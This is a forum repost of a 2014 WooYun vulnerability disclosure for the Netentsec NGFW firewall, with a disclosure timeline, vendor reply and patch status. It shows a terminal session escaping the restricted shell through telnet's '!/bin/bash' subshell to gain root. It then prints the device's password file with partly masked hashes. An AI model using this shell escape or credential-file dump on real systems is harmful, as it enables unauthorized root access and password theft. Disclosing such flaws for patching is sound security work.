中神通公司技术论坛 - Powered by Discuz! Board

标题: 网康NGFW跳出沙盒直接访问设备内文件 [打印本页]

作者: linda 时间: 2014-12-31 11:51 标题: 网康NGFW跳出沙盒直接访问设备内文件

漏洞概要
缺陷编号： WooYun-2014-60065
漏洞标题：网康NGFW跳出沙盒直接访问设备内文件

相关厂商：       网康科技
漏洞作者：       路人甲
提交时间：       2014-05-09 17:16
修复时间：       2014-08-07 17:18
公开时间：       2014-08-07 17:18
漏洞类型：       非授权访问
危害等级：       中
自评Rank：       10
漏洞状态：       厂商已经修复
漏洞来源：       http://www.wooyun.org
Tags标签：    设计缺陷/边界绕过敏感端口对外访问
 未授权访问
漏洞详情披露状态：
2014-05-09：       细节已通知厂商并且等待厂商处理中
2014-05-12：       厂商已经确认，细节仅向厂商公开
2014-05-22：       细节向核心白帽子及相关领域专家公开
2014-06-01：       细节向普通白帽子公开
2014-06-21：       细节向实习白帽子公开
2014-08-07：       厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：听说提交网康的漏洞有钱拿
详细说明：问题出在对telnet命令的判断上，只要telnet命令有参数，就允许执行（默认shell只能完成设备本身的管理相关的功能）。

但是进了telnet的命令，就可以执行外部命令了，包括shell

code 区域[root@NGFW ~]# telnet -n test
telnet> help
Commands may be abbreviated.  Commands are:

close          close current connection
logout       forcibly logout remote user and close the connection
display       display operating parameters
mode          try to enter line or character mode ('mode ?' for more)
open          connect to a site
quit          exit telnet
send          transmit special characters ('send ?' for more)
set          set operating parameters ('set ?' for more)
unset          unset operating parameters ('unset ?' for more)
status       print status information
toggle       toggle operating parameters ('toggle ?' for more)
slc          change state of special charaters ('slc ?' for more)
z             suspend telnet
!             invoke a subshell
environ       change environment variables ('environ ?' for more)
?             print help information
telnet> !/bin/bash
bash: complete: -E: invalid option
complete: usage: complete [-abcdefgjksuv] [-pr] [-o option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] [name ...]
bash: complete: -D: invalid option
complete: usage: complete [-abcdefgjksuv] [-pr] [-o option] [-A action] [-G globpat] [-W wordlist] [-P prefix] [-S suffix] [-X filterpat] [-F function] [-C command] [name ...]
[I have no name!@NGFW ~]# w
17:27:26 up  2:34,  1 user,  load average: 3.19, 2.88, 3.08
USER    TTY    FROM             LOGIN@ IDLE JCPU PCPU WHAT
[I have no name!@NGFW ~]# id
uid=0 gid=0(root) groups=0(root),502(vyattacfg),503(vyattaop)
[I have no name!@NGFW ~]# exit
telnet> [root@NGFW ~]#
[root@NGFW ~]#
漏洞证明：你们的系统竟然密码不写在shadow里面

code 区域root

1$9HNbC4XF$打码5wFX1:15639:0:99999:7:::
bin:*:15805:0:99999:7:::
daemon:*:15805:0:99999:7:::
adm:*:15805:0:99999:7:::
lp:*:15805:0:99999:7:::
sync:*:15805:0:99999:7:::
shutdown:*:15805:0:99999:7:::
halt:*:15805:0:99999:7:::
mail:*:15805:0:99999:7:::
news:*:15805:0:99999:7:::
uucp:*:15805:0:99999:7:::
operator:*:15805:0:99999:7:::
games:*:15805:0:99999:7:::
gopher:*:15805:0:99999:7:::
ftp:*:15805:0:99999:7:::
nobody:*:15805:0:99999:7:::
distcache:!!:15805:0:99999:7:::
vcsa:!!:15805:0:99999:7:::
pcap:!!:15805:0:99999:7:::
ntp:!!:15805:0:99999:7:::
dbus:!!:15805:0:99999:7:::
apache:!!:15805:0:99999:7:::
mailnull:!!:15805:0:99999:7:::
smmsp:!!:15805:0:99999:7:::
sshd:!!:15805:0:99999:7:::
haldaemon:!!:15805:0:99999:7:::
netentsec

1$UYIQ2Phc$U打码y.GiyvG7.Nu91:15805:0:99999:7:::
postgres:!!:15805:0:99999:7:::
quagga:!!:15805:0:99999:7:::
vyatta:!$1$y9RDC/fm$fs7/W打码pTG9k1:15805:0:99999:7:::
admin

1$7Crwx2MW$2LvR打码Gbw6ZAfO0:15805:0:99999:7:::
lighttpd:!!:15805:0:99999:7:::
ldap:!!:15805:0:99999:7:::
修复方案：多判断下参数
版权声明：转载请注明来源路人甲@乌云
漏洞回应
厂商回应：
危害等级：中
漏洞Rank：10
确认时间：2014-05-12 09:48
厂商回复：感谢反馈，将尽快发布更新补丁解决。
最新状态：2014-07-14：已通过更新补丁解决

原文：http://www.wooyun.org/bugs/wooyun-2014-060065

[ 本帖最后由 linda 于 2016-2-16 11:09 编辑 ]

欢迎光临中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)